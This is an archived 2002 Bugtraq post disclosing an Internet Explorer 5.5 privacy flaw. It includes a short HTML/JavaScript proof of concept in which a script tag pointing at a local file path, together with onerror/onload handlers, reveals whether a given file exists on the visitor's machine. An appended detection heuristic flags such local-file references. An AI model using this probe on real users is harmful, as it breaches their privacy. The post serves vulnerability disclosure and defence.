[23690] in bugtraq


Serious IE privacy issues

daemon@ATHENA.MIT.EDU (Tom Micklovitch)
Thu Jan 3 17:11:24 2002

Message-ID: <20020103120831.2739.qmail@web20305.mail.yahoo.com>
Date: Thu, 3 Jan 2002 04:08:31 -0800 (PST)
From: Tom Micklovitch <h_bugtraq@yahoo.com>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

In addition to "Minor IE System Info Disclosure"
(Nov 4 2001) I've found that you can further poll
a system for ANY file, provided you know its
path. Use the following script:
<html>
<head>
<script language="javascript">
<!--
var fileExists = false;
function yes()
{
	alert("the file exists.");
	// record the result so the later onload handler stays quiet
	fileExists = true;
}

function no()
{
	if(!fileExists)
	{
	alert("the file does not exist.");
	}
}

window.onerror = yes
window.onload = no
//-->
</script>
<script language="javascript"
src="file://c:\autoexec.bat"></script>
</head>
</html>

This will cause an alert "yes" if it exists, and
alert "no" if not.

The reason is that autoexec.bat does not
contain any valid javascript commands, so the
onerror event is fired. Any non-existent file
will not generate an error, so the onload event
fires.

Tested with IE5.5

Still could do with some tweaking.

-User24 (freetimers.com)
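
A defender-side check for the pattern described in this post, as an added example that is not part of the original message: it scans markup served from a non-local URL for elements that load a `file:` or drive-letter path as a sub-resource. The function names, the element list and the sample page are assumptions made for the illustration.

```javascript
// Added example: flag markup that loads a local file as a sub-resource.
// Names and the element list are assumptions, not from the original post.
// Regex-based heuristic: text inside <script> bodies is not excluded.

// Elements whose URL attribute triggers a fetch that raises load/error events.
const URL_ATTRS = { script: 'src', img: 'src', iframe: 'src', link: 'href' };

// True for file: URLs and bare Windows drive or UNC paths (c:\x, \\host\share).
function isLocalReference(url) {
  const u = url.trim().toLowerCase();
  return u.startsWith('file:') || /^[a-z]:[\\/]/.test(u) || u.startsWith('\\\\');
}

// Parse the attributes of one start tag into a lower-cased name -> value map.
function parseAttrs(tagBody) {
  const attrs = {};
  const re = /([^\s=\/>]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// Return findings for a page; pageUrl is where the markup was served from.
function findLocalFileProbes(html, pageUrl) {
  // A page that is itself local may legitimately reference local files.
  if (isLocalReference(pageUrl)) return [];
  const findings = [];
  const tagRe = /<\s*([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const attr = URL_ATTRS[tag];
    if (!attr) continue;
    const value = parseAttrs(m[2])[attr];
    if (value !== undefined && isLocalReference(value)) {
      findings.push({ tag, attr, value, offset: m.index });
    }
  }
  return findings;
}

// Constructed sample modelled on the markup in the post.
const SAMPLE = '<html><head><script language="javascript"\n' +
  'src="file://c:\\autoexec.bat"></script>\n' +
  '<script src="/static/app.js"></script></head></html>';
```

Each finding carries the tag, attribute, referenced path and byte offset, which is enough to feed a proxy or mail-gateway rule that blocks or logs the page.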
